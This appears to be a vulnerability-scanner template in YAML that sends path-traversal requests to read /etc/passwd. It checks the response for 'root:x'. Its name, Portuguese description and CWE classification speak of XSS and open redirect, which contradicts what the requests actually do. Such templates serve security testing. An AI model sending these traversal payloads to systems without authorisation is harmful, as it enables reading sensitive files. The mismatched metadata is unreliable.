http:
- matchers:
  - condition: and
    part: body
    type: word
    words:
    - root:x
  - condition: and
    part: header
    type: word
    words:
    - text/html
  - status:
    - 200
    type: status
  matchers-condition: and
  method: GET
  path:
  - '{{BaseURL}}/%2e%2e/etc/passwd'
  - '{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd' 

id: xss-reflect-fuzzer-xandsz-71
info:
  author: xandsz
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cwe-id: CWE-601
  description: "Verifica par\xC3\xA2metros ocultos que refletem dentro do HTML da\
    \ p\xC3\xA1gina.\n"
  metadata:
    max-request: 2
  name: xss-fuzz
  severity: medium
  tags: fuzzer, generic
